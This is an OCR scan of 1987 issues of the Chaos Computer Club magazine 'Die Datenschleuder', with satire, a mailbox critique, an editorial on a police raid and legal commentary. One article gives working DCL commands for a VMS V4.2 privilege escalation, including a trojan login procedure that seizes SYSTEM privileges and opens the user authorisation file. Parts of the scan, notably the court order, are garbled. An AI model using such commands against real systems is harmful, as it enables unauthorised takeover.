Endvermittlungs-Nebenstellenanlagen sind über 
Querverbindungen an eine Knotenvermittlung und 
über Amtsleitungen an das öffentliche Fernsprech¬ 
netz angeschlossen. 

Wer vom 20. bis 27. Oktober ’87 zur Weltausstel¬ 
lung des Femmeldewesens der TELECOM in Genf 
reist, kann sich dort über den neuesten Stand der 
ISDN-Technik, nicht nur von Siemens, informieren. 

LS23 

SolcMürf^icBfccr 


Seite 15 




Real Programmers don’t use 
PASCAL Teil III 

In was für einer Art von Umgebung funktioniert 
ein Richtiger Programmierer am besten? Das ist 
eine wichtige Frage für den Auftraggeber von 
Richtigen Programmierern. In Anbetracht der 
Stange Geld, die ein Stab von Mitarbeitern ko¬ 
stet, erscheint es am besten, sie oder ihn in einer 
optimalen Umgebung unterzubringen. 

Der typische Richtige Programmierer lebt vor einem 
Computerterminal. Um das Terminal herum liegen 
die Listings aller Programme, an denen er jemals 
gearbeitet hat. Diese sind in grob chronologischer 
Ordnung auf jeder ebenen Fläche des Büros gesta¬ 
pelt. Ebenfalls zu finden ist etwa ein halbes Dutzend 
halbvoller Tassen mit kaltem Kaffee. Gelegentlich 
schwimmen Zigarettenstummel in dem Kaffee, ln 
einigen Fällen enthalten die Tassen auch Orangen¬ 
saft. Weiters, äußerer ist wirklich SEHR gut, werden 
sich Kopien des OS JCL-Handbuchs finden, sowie 
die 'Principles of Operation’, aufgeschlagen auf teil¬ 
weise recht interessanten Seiten. An die Wand ge¬ 
heftet befindet sich ein auf einem Uralt-Printer ge¬ 
druckter Snoopy-Kalender aus dem Jahre 1969. 
Über den Boden verstreut liegen die Verpackungen 
diverser mit ErdnuDbutter gefüllter Käsebrote. 
Schließlich, in der Unken obersten Schreibtisch¬ 
schublade, unter einer Schachtel Kekse, befinden 
sich Flußdiagramm-Fotmulare, die ein Vorgänger 
da zurUckgelassen hat. Richtige Programmierer 
schreiben Programme, keine Dokumentation, die für 
das Wartungspersonal hinterlassen wird. 

Der Richtige Progreammicrer ist, unter großem 
Druck, in der Lage, 30, 40, sogar 50 Stunden in 
einem durch zu arbeiten. Er schätzt es, so zu arbeiten. 
Leeriaufzeiten sind für den Richtigen Program¬ 
mierer kein Problem; sie geben ihm die Möglichkeit, 
ein Mützchen Schlaf zwischen zwei Compüer- 
durchgängen zu nehmen. Wenn nicht genug Ter¬ 
mindruck auf dem Richtigen Programmierer lastet, 
tendiert er dazu, die Zügel schleifen zu lassen, indem 
er in den ersten neun Wochen an einem kleinen, aber 
interessanten Bereich des Problems herumbastelt. 
Dann schließt er die gesamte Arbeit in der letzten 
Woche ab, in zwei oder drei 50-Stunden-Marathons. 
Das beeindruckt nicht nur seinen Auftraggeber, son¬ 
dern liefert gleichzeitig eine bequeme Ausrede da¬ 
für, daß keinerlei Dokumentation vorhanden ist. 
Generell: Kein Richtiger Programmierer arbeitet 
von 9 bis 5, außer in der Nacht. Richtige Program¬ 
mierer tragen auch keine Krawatten. Richtige Pro¬ 
grammierer tragen keine hochhackigen Cowboy¬ 


stiefel. Richtige Programmierer treffen gegen 
Mittag im Büro ein. Ein Richtiger Programmierer 
weiß den Namen seiner Frau, oder er weiß ihn auch 
nicht. Was er auf jeden Fall weiß, ist die gesamte 
ASCII-(oder EBCDIQ-Codetabelle. Richtige Pro¬ 
grammierer wissen nicht, wie man kocht. Lebens¬ 
mittelgeschäfte sind selten um 3 Uhr morgens ge¬ 
öffnet. also müssen sie mit Keksen und Kaffee über¬ 
leben. 

Wirft man einen Blick in die Zukunft, so ziehen 
einige Richtige Programmierer in Betracht, daß die 
jüngste Programmierer-Generation nicht mit den 
selben A ussichten groß geworden ist wie ihre Eltern. 
Viele von ihnen haben nie einen Computer mit einer 
Schalttafel gesehen. Nur wenige, die heute von der 
Schule kommen, beherrschen Hexadezimalarith¬ 
metik ohne einen Taschenrechner. Die heutigen 
College-Absolventen sind gegenüber der hanen 
Programmier-Wirklichkeit wie in Watte gepackr 
durch Source Level Debugger, Text-Editoren, die 
Klammem zählen, und benutzerfreundliche Be¬ 
triebssysteme. Am schlimmsten ist, daß einige die¬ 
ser angeblichen Computerwissenschaftler eine Gra¬ 
duation schaffen, ohne FORTRAN zu lernen! Steht 
uns bevor, eine Gesellschaft von Unix-Hackem und 
Pascal-Programmierern zu werden? 

Nach meinem Dafürhalten sieht die Zukunft für 
Richtige Programmierer nach wie vor glänzend aus. 
Weder OS/370 noch FORTRAN zeigen Anzeichen 
auszusterben, den boshaften Bemühungen von 
Pascal-Programmierern zum Trotz. Auch sehr sub¬ 
tile Tricks wie etwa der Versuch, FORTRAN struk- 
turiene Code-Konstmkte unterzujubeln, sind fehl- 
geschlagen. Ja sicher, ein paar Computerhändler 
sind mit FORTRAN77-Compilem rausgekommen, 
aber in jedem von denen gibt es einen Weg, auf dem 
er sich selbst in einen FORTRAN66-Compiler zu¬ 
rückverwandeln kann - um DO-Schleifen zu com- 
pilieren wie Gott es vorgesehen hat. 

Sogar Unix scheint nicht mehr ganz so schlimm für 
Richtige Programmierer zu sein, wie es einmal war. 
Die letzte Version von Unix hat die Stärken eines 
Betriebssystems, das eines Richtigen Programmie¬ 
rers würdig ist. Es hat zwei unterschiedliche und 
subtil inkompatible User Interfaces, einen überzo¬ 
genen und komplizierten DFÜ-Treiber, und vir¬ 
tuellen Speicher. Wenn man von der Tatsache ab- 
sicht, daß es strukturiert ist, kann sogar das Pro¬ 
grammieren in C für einen Richtigen Programmierer 
annehmbar werden. Es gibt kein Type Checkjng, 
Variablennamen sind sieben (10? acht?) Zeichen 
lang, und das Bonbon des Pointer-Datentyps ist noch 
hinzugefügt. Es ist aJs hätte man die besten Teile von 

SntciiSdjlcubcr 



Seite 16 


FORTRAN und Assembler in einer Sprache; noch 
ohne an einige der mehr künstlerischen Anwen¬ 
dungen für „define zu denken. 

Nein, die Zukunft ist nicht dunkel, ln den letzten 
J ahren hat die Presse auchdieglänzendeScharneuer 
Computerleutchen und Hacker bemerkt, die aus Or¬ 
ten wie Stanford oder MIT in die Richtige Welt 
rausgehen. Allem Anschein nach lebt der Geist des 
Richtigen Programmierens in all diesen jungen 
Männern und Frauen weiter. Solange es abartig de- 
finierteSprungziclc, bizarre Bugs und unrealistische 
Tabellen gibt, wird es Richtige Programmierer ge¬ 
ben, gewillt einzuspringen, das Problem zu klären 
und die Dokumentation auf später zu verschieben. 
Lang lebe FORTRAN! 

Ed Post; Wilsonville, Oregon; Datamation 7183. 
(übernommen aus FORTHTREE/Hamburg) 

Übersetzung ins Deutsche von Peter Glaser 

Mailboxen in den Kinderschuhen 

Anmerkungen 

Mittlerweile bin ich seit ca. einem Jahr online. 
Anlaß für mich, die Mailboxszene einmal kritisch 
zu beleuchten. Meine Ausführungen beziehen 
sich in erster Linie auf Hamburg, dürften sich 
aber im wesentlichen auf das restliche Bundes¬ 
gebiet übertragen lassen. 

Wieviele Anwender mag es wohl in Hamburg geben, 
die sich mittels DFU mehr oder weniger regelmäßig 
in den ca. 20 örtlichen Mailboxen tummeln? Ich 
würde schätzen, daß die Zahl sehr deutlich unter 
1.000 liegt. Die Zahl deijeniger aber, denen nur noch 
einAkkustikkopplerfürnurca. DM 200,- (und evtl, 
noch eine nachriistbare ser. Schnittstelle) fehlt, um 
DFü betreiben zu können, würde ich auf ein paar 
10.000 schätzen). 

Warum aber läßt die ganz große Mehrheit der Com¬ 
puterbesitzer die DFü und Mailboxen offensichtlich 
völlig kalt? Und das, wo in den Computerzeii- 
schriften und der allgemeinen Presse die DFü jaalles 
andere als totgeschwiegen wird? Obwohl die DFü so 
jung nun auch nicht mehr ist? Wie paßt das alles 
zusammen? 

Ich denke es liegt daran, daß die Mailboxen noch 
immer in den Kinderschuhen stecken. Und sie ma¬ 
chen keinerlei erkennbare Anstalten, aus ihnen her¬ 
auszuwachsen. Gewiß, es gibt eine zunehmend grö¬ 
ßere ZahJ von Boxen, die nicht mehr auf einem C64 
mit I80kB-Floppy arbeiten; sondern auf 68k- 
Rechnem oder XT's, AT’s und sogar 386er unter 

SiiifciiSdjfciiiicr 


Unix. Festplatten von 20, 30 und mehr MB sind 
schon fast Standard, Auch nimmt die Zahl der Bo¬ 
xen, die zwei und mehr Ports bieten, in letzter Zeit 
ständig zu. Vereinzelt sind lobenswerterweise auch 
endlich Bestrebungen zu erkennen, eine einiger¬ 
maßen einheitliche und bedienerfreundliche Be- 
nutzerführung (GEONET-kompatibel) einzuführen. 
Alle diese Entwicklungen sind grundsätzlich zu be¬ 
grüßen. 

Trotzdem bleibe ich bei meinem doch ziemlich ver- 
nicluendcn Uneil! Einige Sysops verfallen in einen 
Technikrausch, was für sich betrachtet auch noch 
nichtunbedingt negativ zu bewerten ist. Aberes wird 
verkannt, daß die Technik nur Mittel zum Zweck ist 
- nicht weniger, aber auch nicht mehr! Denn an dem 
Inhalt der Boxen wird kaum etwas geändert. Der 
Inhalt ist und bleibt weitestgehend uninteressant. 
Jedenfalls für die große Mehrzahl von Computer- 
besitzem, die die DFÜ bisher hat nicht locken kön¬ 
nen. 

Wie sieht denn heute eine Mailbox aus? Da gibt es 
die GEONET-Boxen und die vielen regionalen 
“Freak-Boxen“. Die GEONET-Boxen bieten zwar 
Telex, Intermail und Datenbankzugriffe. Aber 
sonst? An den öffentlichen Brettern (und neuerdings 
sogar in den privaten Fächern - pfui Teufel!) haupt¬ 
sächlich Werbemüll kommerzieller Anbieter den 
man, wenn man darauf steht, in BTX besser und 
billiger haben könnte. Infolgedessen werden diese 
Boxen hauptsächlich von Firmen und Freiberuflern 
genutzt, die sich einen geschäftlichen Vorteil davon 
versprechen. Die nicht-kommerziellen regionalen 
Boxen sind vom Werbemüll glücklicherweise bisher 
verschont geblieben. Interessanter sind sie dennoch 
nicht. Was bieten sie schon viel mehr als das klas¬ 
sische (und im Prinzip gar nicht schlechte, ja wohl 
sogar fast unverzichtbare!) Suche, Biete, Allge¬ 
meines, Kontakte sowie evtl, ein paar Rechnercomer 
und wenn es hoch kommt noch einige Programme 
zum download? (Fast) nichts! Das kann doch wirk¬ 
lich allenfalls einen computerbegeisterten Freak rei¬ 
zen. 

Ich halte das für sehr bedauerlich. Maiiboxen könn¬ 
ten sehr viel mehr bieten, als den hier angedeuteten 
Service für gewisse Kreise von Geschäftsleuten ein¬ 
erseits und die Computerfreaks andererseits. Dienste 
und Informationen, die nicht nur für diese beiden 
Gruppen von Computerbesitzer potentiell interes¬ 
sant sind, sondern für jeden. 

Bretter wie beispielsweise G.ID, Umwelt, Mitfahr¬ 
zentrale in der CLINCH gehen schon in die richtige 
Richtung, schöpfen die potentiellen Möglichkeiten 
einer Mailbox aber noch lange nicht aus, Mailboxen 

Seife 17 




könnten preiswene und top-aktuelle Stadt- und 
Stadtteilzeitschriften herausgeben. Sie könnten Fo¬ 
rum für Bürgerinitiativen, Parteien, Vereine aller Art 
sein. Sie könnten Anzeigenblätter ersetzen oder er¬ 
gänzen. Mailboxen wären das ideale Diskussions¬ 
und Informationsforum für alle nurerdenkliche The¬ 
men. Das sind nur wenige Beispiele. Der Phantasie 
sind kaum Grenzen gesetzt. 

Aber in dieser Richtung tut sich fast gar nichts. Die 
meisten Sysops scheint die Technik ihrer Box viel 
mehr zu interessieren als deren Inhalt. Leicht ist es 
auch gewiss nicht, hier etwas erfolgreich zu unter¬ 
nehmen. Denn wenn einraalein interessanter Ansatz 
unternommen wird, scheitert er meist daran, daß sich 
niemand dafür interessiert. Das liegt eben daran, daß 
bisher nur wenige die DFü nutzen, und sich diese 
wenigen aus zwei ganz speziellen Interessenten¬ 
kreisen rekrutieren. Aberdas hat seine guten Grün¬ 
de. 

Wie schon erwähnt, wird in der (Fach-) Presse viel 
über DFü und Mailboxen berichtet. Wenn man diese 
Berichte liest, drängt sich der Eindruck auf, DFÜ sei 
nur etwas für gestreßte Geschäftsleute (Typ: jung, 
dynamisch, erfolglos), die unbedingt in einer ame¬ 
rikanischen Datenbank nach den neuesten Patenten 
recherchieren müssen, oder aber für leichenblasse, 
picklige, pubertäre Computerkids, die Tag und 
Nacht vorm Rechner sitzen, um den Haspa-Coup des 
CCC nachzuahmen oder sogar zu übertreffen. Mil 
solchen Darstellungen kann man den durchschnitt¬ 
lichen Computeranwender die DFü natürlich nicht 
schmackhaft machen. 

Die relativ wenigen User, die sich von diesen Dar¬ 
stellungen nicht abschrecken lassen, werden aber 
schnell frustriert, wenn sie sehen, was die DFü ihnen 
zu bieten in der Lage ist. Der Akkustikkoppler ver¬ 
staubt oder wird wieder verkauft... Wie könnte man 
aus dieser Misere kommen? Ich glaube, es müßte 
zweigleisig vorgegangen werden. 



Einerseits müßten sich die Sysops nicht nur um den 
technischen, sondern auch und gerade um den in¬ 
haltlichen Ausbau ihrer Boxen verstärkt bemühen. 
Natürlich kann das nur bei tatkräftiger Mithilfe der 
User gelingen. Diese ist daher vermehrt anzustreben. 
Sicherlich ist das leichter gesagt, als getan. Aber der 
Versuch muß unternommen werden. 

Daneben müssen aber auch neue User geworben 
werden. Nicht aus den typischen Kreisen, die schon 
heute die Boxen benutzen, sondern der “Otto- 
Normal-Usei" muß angesprochen werden. Dafür 
muß darauf hingewirkt werden, daß die Berichter¬ 
stattung in der (Fach-)Presse sich wandelt. Auch die 
Selbstdarstellung der Mailboxen und Computerc- 

Seile 18 


lubs läßt in diesem Sinne stark zu wünschen übrig. 
Weiterhin müßten die User möglichst direkt ange¬ 
sprochen werden. Was würde es beispielsweise groß 
kosten, wenn sichdie örtlichen Mailboxen und Com¬ 
puterclubs zusammentäten und die Händler bäten. 
Jedem verkauften Computer ein Flugblatt von ihnen 
beizulegen. Darin könnte dem neuen, stolzen und 
meist hilflosen Computerbesitzer Hinweise gegeben 
werden. Z.B., daß es neben Spielen und Text- /Da¬ 
tenverarbeitung auch noch DFü und Mailboxen gibt. 
Ganz in seiner Nähe. Preislich und technisch leicht 
zu erreichen. Und natürlich was das neue Medium 
gerade ihm an konkreten Vorteilen und Leistungen 
bietet. Nur das muß halt mehr sein, als das obligate 
Suche, Biete,... 

Wenn sich in der hier angedeuteten Richtung nicht 
etwas bewegt, dann werden wir in einigen Jahren ein 
paar Boxen haben, die auf einer Cray II laufen, in 
denen aber bei kaum gestiegenen Userzahlen der 
gleiche Müll zu lesen sein wird wie heute auf einem 
PC und früher auf einem C64. 

STOEPSEL 


IMPRESSUM 

Die Datenschleuder Numero 22 • Juli 1987 
Das wissenschaftliche Fachblatt für Daten¬ 
reisende 

D-2000 Hamburg 20 
Schwenckestrasse 85 

Geonet; Geol:Chaos-Team 
CLINCH : Chaos-Team 
Btx: ‘Chaos., 

tel; 040-4903797 / 040-483752 
ViSdP: Reinhard Schrutzki 
Herausgeber Chaos Computer Club 

Mitarbeiter (u.a.): 

DDT, A. Eichler, P. Franck, H. Grusel, Herward 
Holland-Moritz, jwi, Marina Kem, KS, M. Kuehn, 
Andy M.-M., J. Nicolas, padeluun, Poetronic, S. 
Stahl, S. Wemery. 

Nachdmck für nichtgewerbliche Zwecke bei Quel¬ 
lenangabe erlaubt. 

GutereinDruck im Selbstverlag. 

Juli 1987 

£>fllcnßif|lcubcr 







Numero 23 - Oktober 1987 













































































































































































































































kleiMamge 


Arnlsperlf l»l Mnrnhii »’0 



ii.'iiAtii.Tii.. 1.- '.<• ^572 



162 0. 060/67 

I 111 

M-in? 572 

16.9.190? 

41 .n 36/B7 





Beschluß 


t.i «l'•m rfiiitfllMtiii«vcrlnliirM (iru|fii Stoffen ] V’ • F TI • T JT • 

f.ffh, ln Vuf»p#rtal, u-*. 



der Ann 


■ßhene von Daten 


l»»M lilifl'i fliK 1 l.'itubuiq. AblniliHUj ^OP. 

iIiimIi H«’n /jüc nirhiri (irrt an» Amt^qprirhl f'jjßcllj 

Auf Aiil!;i(i fit’t r»liMl';;mw.ili' 5 » h;ill l*f'i rlt-tn lil IbinilitiMi wiifl <lif Dtiit lnir Iiiiimi 

KIX ilfi Wnlm iMifl N>‘l«'iitriiitn>* 


KIK «li'T CiPsclinft« imtl simsii»int« nruirlijraiitnp 

aw / np^t:iiiiiHif|if'n stc/fcn Vemery 

Eppendorfcr Lendrt.r. 165 bei Tlslua, 
20CX) Harahur/f IO, 

der ihm gehörenden Sachen 

5 r'wi»* / 2 B>fK iMul ^Cttirr/XOCXXKinflfnlit 7 C(iqp an(iPOi(lf»r( 

fi t ii u iP n ; 


[i,.t / nKK nrsciminiiil'’ Is! aiifqiniul dpi tiislH'iiiipii Etiilitlliinqpii vpidai hlirt, 

gemelnrnm mit noch nicht »nsrclchand identlllriertrn Clubolljllodem 
Yon IJarehtirg aus ln dar Zelt nach dam 01. On. 1996 jvwellr. allein oder* 

5 eijelnpalwftllch handelnd durch mehrere aolbatMndigr HrndlunR^n, 
pwellfl durch dieselbe llandlum 

• ) unbefugt Daten, die nicht für aie baatimmt und di« aegen unberech¬ 
tigten Zugang beaonder« gee.lchert sind, sich odrr el.nptn anderen 
vernchefft tu haben, 

b) eine Datenverarbeitung, die dUr einen freaden betrieb ein Crendes 
Vntemehieen pder eine Behörde von vesentlioher Bedeutung lat, de- 


I «uroh gtatBrt Bu bttMn, ««8 alt r*oht»wl<lrU D«ten la.oht-n, 

' «nt.rdrUokt.n, «mbrauonbar aaoht.n o4.r T*rllnd»rt»n, 

Indn «ll.ln hBnd.lnd od.r ■•■■Inaaa 

1) fnd«cö^t»r*r«t*» TAX «.r turopil.ohm Ori«nlP.tl»n fUr 

K.mforpohitn* (C*»») ln O.nl flchw*l«) D.t«n mi"- 

>pkht«n und vunn<l«r*«D, vob*l ««J 

T»r«nd*rt wur«l»n, 4a« fUr 41« l.raohtl«!.!! k.ln. (Wgllohk.lt 
■•hr Iw.tand, auf Ihr aln"«* W»t*a suiuxrAlfm, 

2) b*l dar rlraa rhlllpa ln Franki^loh ln 4aa 4ortl|. TAI-Cna- 
Butarivitaa alndranaan, Datan taaapkhtan ^ Tjrlndmrtan .e>- 

« 1 « •AoooxratlB,*-Ak»anunttrlag4'' »u.lB.ohtan. ^nnwort» 

Bodlflilart.n und Prafran«. auf Py«t»anlTe«u hlrrufU*tan, 
wob.l ln h«ldan mian hal 4 *n lOrgmnlBBtlon.n aohid.n »nt- 
■tand.n, dl. B.lt. iwoh nloht dbaahbar «Ind. 
lT«r«.h.n, itrafbar «aalR {« 802a,j303a, JOJb, 25 Ab». 1 und ?, 

52, 53 StGB. 



I 




SatciiSrfjkiiikcr 


Editorial 



Lieber Leser! 

Die beste Ausrede für unser diesmaliges Späler- 
scheinen werden Sie sicherlich schon der Tages¬ 
presse entnommen haben. Es bereitet uns einige 
Schwierigkeiten, diese Datenschleuder mit einem 
erheblichen Defizit an Redaktionsmaterial und 
-Technik so aufzubereiten, wie sie jetzt hinter uns 
und vor Ihnen liegt. Leider hat uns das Bundes¬ 
kriminalamt einiger Wissensmaschinen von zen¬ 
traler Bedeutung für die Blldschirmtcxt- und 
Datenschleuder-Redaktion entledigt. 

Das BKA hat sich bei uns nun also nicht nur eine 
kostenlose Schulung im Hacken sowie eine Grund- 
ausstatlung vorsortierter Literatur, sondern auch die 
persönlichen Daten aller unserer Mitglieder und 
Abonnenten abgeholt. 

Jeder Abonnent der Daleschleuder und Jedes 
Mitglied des CCC e.V. ist daher spätestens jetzt 
beim BKA aktenkundig. Es kann nicht davon 
ausgegangen werden, daß der Datenschutz ge¬ 
wahrt wird. 

In diesem Zusammenhang sei darauf hingewiesen, 
daß ein eventueller Prozeß zur Schaffung von Prä¬ 
zedenzfällen für das zweite WiKG wahrscheinlich 
zu keinem juristisch brauchbaren Ergebnis, mit Si¬ 
cherheit aber zu unserem ökonomischen Exitus füh¬ 
ren würde, denn trotz öffentlicher Äußerungen dies¬ 
bezüglich sind bisher leider keine Eingänge von 
Gorbie oder seinesgleichen auf unseren Konten gut¬ 
geschrieben worden. 

Daher bitten wir die Leser und das Umfeld um 
finanzielle Unterstützung zur Gründung eines Pro- 
zeßkosienfonds für mittellose Hacker. Schließlich 
pflegen wir für eben dieses Umfeld gelegentlich 
unsere Köpfe hinzu halten, wenn irgendwelche wild¬ 
gewordenen Ordnungsbehörden blindwütig um sich 
schlagen. 


y\.uß e.n pdiscKe 
Wel+i^aumsckiffe 


besuchen unsere Erde 



Wir empfehlen, Spenden, die ausschließlich diesem 
Zweck dienen sollen, durch das Stichwort ,J1AC- 
KERHILFE“ eindeutig zu kennzeichnen. 

Doch nun zu einer weiteren Folge aus der Serie 
.J’ech und Pannen“: Die Telefonnummer des Ap¬ 
parates in den Clubräumen („Achtung Abhörge¬ 
fahr“) ist in der letzten Ausgabe zum Leidwesen 
eines nichtsahnenden Postgeschädigten fehlerhaft 
abgedmekt worden. 

Die richtige Nummer lautet: 

490 37 57 

„ EinSpecht hackt jetzt an unseren Rechnern undwir 
hacken auf der Schreibmaschine.“ 


Snlcnädilciilicr 


Vic. 


3 













Erwartungsgemäß soll jede Art von Software, 
insbesondere das Betriebssystem einer Reche¬ 
nanlage, dem Anwender einen fehlerfreien und 
sicheren Betrieb des Computersystems garan¬ 
tieren. Die Systementwickler entwerfen Pro¬ 
gramme, ohne auch nur im geringsten zu er¬ 
warten, daß sie auf Anhieb korrekt sein werden. 
Programmierer verbringen mindestens genau so¬ 
viel Zeit damit, ihre Software zu testen und even¬ 
tuellen Fehlern entgegenzuwirken. 

Was das im einzelnen für Bugs, also Fehler sind, ist 
schwer zu sagen. Manche sind sicher harmlos, an¬ 
dere möglicherweise kritisch und führen zum ge¬ 
fürchteten Systemcrash. Programmierfehler sind 
nun einmal unvermeidbar, und manchmal auch ein¬ 
fach unauffindbar. 

Wer dennoch glaubt, daß Software Engineering pri¬ 
mitiv ist und Fehler gmndsätzlich vermieden werden 
können, der hat noch keine größeren Probleme in 
algorithmischer Form in Angriff genommen. Die 
großen Systemhersteller beschäftigen Spezialisten 
ausschließlich für die Qualitätssicherung ihrer Soft¬ 
wareprodukte. Denn sie wissen, daß Programmierer 
eigene Fehler am schwersten finden oder diese gar 
mit Absicht einbauen können. 

Software wird nicht erst dann zur Benutzung frei¬ 
gegeben, wenn sie nachweisbar korrekt funktioniert, 
sondern bereits dann, wenn die Häufigkeit, mit der 
neue Fehler entdeckt werden, auf ein für die Ge¬ 
schäftsleitung akzeptables Niveau gesunken ist. An- 

4 



Wender müssen lernen, Fehler und deren Konse¬ 
quenzen zu erwarten. Ihnen wird gerade von den 
Hackern häufig erklärt, wie sie bis zur Verbesserung 
der Software die Fehler umgehen können. 

Gerade die VAX-Systeme und ihr Bebiebssystem 
VMS von DEC setzen sich aus einfach zu verste¬ 
henden und strukiuriert aufgebauten Software- 
Modulen zusammen, VMS gilt bei den Hackern 
nicht zu Unrecht als eines von der Qualität und 
Systemsicherheit meistgeschätrtesien Betriebssy- 
stemeder Welt. Dochauch indemsoau.sgeklügelien 
VMS werden immer wieder Bugs entdeckt, die sich 
als echte Sicherheitslöcher des Betriebssystems er¬ 
weisen. 

Ziel eines auf Datenreise befindlichen VAX- 
Tüftlers ist bekannterweise nicht nur das Eindringen 
in VAXen, sondern diese auch unter Kontrolle zu 
bekommen. Um sich nun nach einem Eindringen in 
ein VAX-System die nötigen SYSTEM-Privilegien 
zu verschaffen, sucht der geschickte und erfahrene 
Hacker erst einmal nach dem SESAM ÖFFNE DICH 
des Betriebssystems. Erst wenn dieser gefunden ist 
und das Reich der Privilegien erschlossen wurde, gilt 
eine VAX unter Hackern als geknackt bzw. offen. 

Einige dieser SESAM ÖFFNE DICH-VAX- 
Verfahren gingen in die Geschichte ein. Des Hackers 
wahre Freude ist die Vielzahl und Reichhaltigkeit 
dieser Verfahren, um rasch als unpriviligierter User 
den Status des SYSTEM-Managers einzunehmen. 

SnfciiMjIrukcr 


Die Geschichte vom Trojanischen DCL Pferd (Di¬ 
gital Command Language) in VMS V4.2 bietet be¬ 
sonderen Anlaß zur Aufmerksamkeit. DEC bietet 
seit der VMS Generation 4.X ein neues SECURITY- 
Utility an - die ACE's und ACL’s (Access Control 
Eniri es/Lists). 

Ein ACL bietet dem SYSTEM Manager die Mög¬ 
lichkeit, auf bestimmte Objekte, wie etwa Dateien 
und Peripherie, nichtprivilegierten Usern Rechte zu 
gewähren oder eben auch zu verwehren. Seit VMS 
V4.2 ist nun neu, daß ACLs auch auf I.OGICALs 
selzbar sind. Da im Prinzip jeder User ACLs ver¬ 
wenden darf, stellte sich die Frage, ob eben diese 
auch auf Objekte setzbar wären, deren Berührung 
normalerweise SYSTEM-Privilegien erforderte. 

Die Softwareanalytiker bei DEC unterließen in 
VMS V4.2 die Prüfung auf das für eine Modifizie- 
mng der SYSTEM-Tabelle erforderliche 
SYSNAM-Privileg. Dieses ermöglicht nun einem 
nichtpriviligienen User, die SYSTEM Tabelle mit 
einem ACL zu versehen, der äquivalent mit dem 
SYSNAM-Privileg sämtliche Rechte auf die SY¬ 
STEM Tabelle gewähn. 

$ SET ACL/OBJECT=LOGICAL/ACL=(ID=*- 
,ACCESS=R-rW+E+D+C) 

- LNMSSYSTEM-TABLE 

$ SET ACL/OBJE(rr=LOGICA17ACL=(ID=*- 
,ACCESS=R+W+E-hD-KC) 

- LNMSSYSTEM-DIRECTORY 

Diese beiden DCL-Zeiien bieten mit der ID=* jedem 
User einer 4.2er VAX die Rechte R=read, W=write, 
E=execute, D=delete und C=control auf die 
SYSTEM-Tabelle. Dieser Bug birgt weiterhin das 
Risiko eines Systemcrashs, falls ein Unerfahrener 
alle in der SYSTEM-Tabelle befindlichen LOGI- 
CALs löscht. Das SYSNAM-Privileg und somit 
auch dieser ACL zählen zur Gruppe der SYSTEM- 
Privilegien, doch dies bedeutet noch lange nicht, alle 
Privilegien einer VAX zu besitzen. 

Der Hacker bedient sich des Trojanischen Pferdes, 
indem er die Möglichkeit nutzt, fremde LOGICALs 
in die SYSTEM-Tabelle einzutragen. Jeder einlog¬ 
gende User durchläuft eine ihm zugewiesene login- 
Prozedur. Weist man dieser Prozedur einen 
LOGICAL-Namen zu, so wird VMS erst dem LO¬ 
GICAL folgen und nicht erst die Prozedur namens 
LOGIN.COM starten. Im User Authorization File 
(UAF) wird für jeden User diese login-Prozedur als 
^ICMD definiert. Im Grundzustand verwendet 

©plcnSifjfciilicr 


DEC besagtes LOGIN, falls im UAF bei LGICMD 
keine andere Prozedur definiert wurde. 

$ DEFINE/SYSTEM LOGIN DISKtÄDlRECTO- 
RYÜTROJANHORSE.COM 


Das vom LOGICAL LOGIN aufgerufene Trojani¬ 
sche DCL Pferd prüft die Privilegien jedes einlog¬ 
genden Users und läßt die VAX vom eigenen SY¬ 
STEM Manager persönlich sprengen. Als DCL Pro¬ 
zedur bietet sich förmlich an: 

$ IF FSPRIVILEGEC'SETPRV) .EQS. “FALSE“ 

THEN GOTO NIX 

$ SET PROCESS/PRIV[LEGE=ALL 

$ SET PROTEC'nON=(W:RWED) SYSSSY- 

STEMtSYSUAF.DAT 

$ DELETE ’ F$L0G1CAL(“L0GIN“) 

$ DEASSIGN/SYSTEM LOGIN 
$NIX: 

$ §SYS$LOGIN:LOGIN.COM 

Es darf nicht vergessen werden, dieses File auch für 
die Benutzung durch World User freizugeben. Der 
erste einloggende privilegierte User wird unbemerkt 
dem Hacker die Kontrolle über das SYSTEM an¬ 
vertrauen. Der Hacker braucht nur noch mittels des 
UAF-Programms und eventueller Umgehung von 
möglichen Security-Maßnahmen seitens des 
SYSTEM-Managers seinem eigenen Account alle 
Privilegien zu geben. SYSTEM-Manageroder Hac¬ 
ker können natürlich ebenso durch einen ACL die 
Modifizierbarkeit der SYSTEM-Tabelle verhin¬ 
dern. 

$ SET ACL/OBJECT=LOGICAL/ACL=(ID=*- 
.ACCESS=R+E) 

- LNMSSYSTEM-TABLE 

$ SET ACL/OBJECT=LOGICAL/ACL=(ID=*- 
,ACCESS=R+E) 

- LNMSSYSTEM-DIRECTORY 

Diese Methode wurde bereits in der amerikanischen 
DECUS Pagewapper Anfang letzen Jahres disku- 
tien. DEC reagierte damals mit einem VMS-Update 
auf V4.3, womit dieser DCL-Bug verschwand. Er¬ 
staunlicherweise existieren am internationalen Da¬ 
tennetz immer noch Maschinen mit der 4.2er 
Betriebssystem-Version. Kaum zu glauben, daß dort 
noch nicht einmal der Bug bekannt zu sein scheint. 


S.Stahl 

5 



Die aktuellen Tarife für’s Hacken 

I.Teil mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm^m 

Es müssen also Daten sein, die nicht für einen be¬ 
stimmt sind und für die man keine Zugangsberech¬ 
tigung hat. Soweit, so gut. Es muß sich also um Daten 
handeln, die “besonders gesichert“ sind, welche man 
sich oder einen anderen “verschafft“. Was aber ist 
unter “besonders gesichen“ und “verschaffen“ i.S.d. 
Ü 202a StGB zu verstehen? 

Fraglich ist vor allem, ob schon ein einfacher und 
normaler Paßwortschutz die Daten besonders si¬ 
chert. Da es kaum einen simpleren und primitiveren 
Schutz von Daten gibt als eine Paßwortabfrage, kann 
man also wohl kaum von einer besonderen Siche¬ 
rung sprechen. 

Andererseits ist ein Paßwort die derzeit technisch 
unkomplizierteste, wirtschaftlich vertretbarste und 
zugleich auch praktisch sinnvollste Schutzma߬ 
nahme. Außerdem hat der Besitzer der Daten durch 
Jede Freizeitbeschäftigung hat ihren Preis. Zu einen Paßwortschutz hinreichend deutlich gemacht, 
den exclusiven, superteuren Hobbies würde ich (jjese Daten nur befugten Personen zur Verfü- 

das Hacken zählen. Nicht wegen der wuche- gung stehen sollen, und daß er sich um die Abwehr 
rähnlichen Gebühren der Post. So ärgerlich die Unbefugten ernsthaft bemüht. Damit sind die 

auch sein mögen, das allein wäre noch erträglich. Voraussetzungen erfüllt, die der Gesetzgeber erfüllt 

Gemeint sind die aktuellen Tarife“, die ein Hac- wissen wollte, um einen strafrechtlichen Schutz von 
